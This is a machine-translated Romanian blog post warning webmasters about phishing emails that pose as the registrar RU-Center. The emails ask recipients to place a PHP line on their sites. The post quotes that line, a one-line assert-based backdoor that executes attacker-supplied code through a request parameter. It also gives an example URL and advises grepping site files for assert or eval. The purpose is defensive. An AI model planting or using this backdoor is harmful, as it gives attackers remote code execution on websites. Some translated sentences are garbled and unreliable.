Atenție la „webmasterii” care nu cunosc PHP. Vulnerabilitate.

Aceasta este o traducere automată.
Faceți clic aici pentru a citi publicația în limba originală.

Astăzi, unii dintre prietenii mei au primit scrisori, presupuse de la RU-Center (cel mai mare registrator de nume de domeniu rus) - nic.ru , cu următorul conținut:

Scrisorile au fost trimise de la info@nic.technical . În scrisoare, atacatorii, care se reprezintă în numele RU-Center, sugerează plasarea următorului cod pe site:

 <?php assert(stripslashes($_REQUEST[RUCENTER])); ?>

Din păcate, mulți dintre colegii noștri, care se numesc „webmasteri” (numeroși proprietari de site-uri), nu cunosc PHP și nu se gândesc la pericolele codului de mai sus. Dacă treceți un șir ca parametru la această funcție, atunci acesta va fi considerat de assert () ca cod PHP! Fii atent!

Vă recomandăm să vă inspectați proiectele php pentru vulnerabilități utilizând comenzile assert sau eval. Dacă aceste comenzi sunt prezente în codul proiectului, nu intrați în panică - studiați algoritmul lor. Este autorizată utilizarea autorizată a algoritmilor. În cazul exemplului de mai sus, comanda va permite atacatorilor să vă apeleze site-ul, de exemplu, utilizând parametrul RUCENTER - http://sistema-audit.ru/?RUCENTER=PHP-code

Vă recomandăm să efectuați o căutare utilizând, de exemplu, comanda linux grep -i -r 'assert' / home / www / mysite / * indicând folderul cu fișierele site-ului pentru a obține o listă de fișiere în care persoanele suspecte instanță este codul utilizat.

Ai grijă de tine și de site-urile tale!

Aceasta este o traducere automată.
Faceți clic aici pentru a citi publicația în limba originală.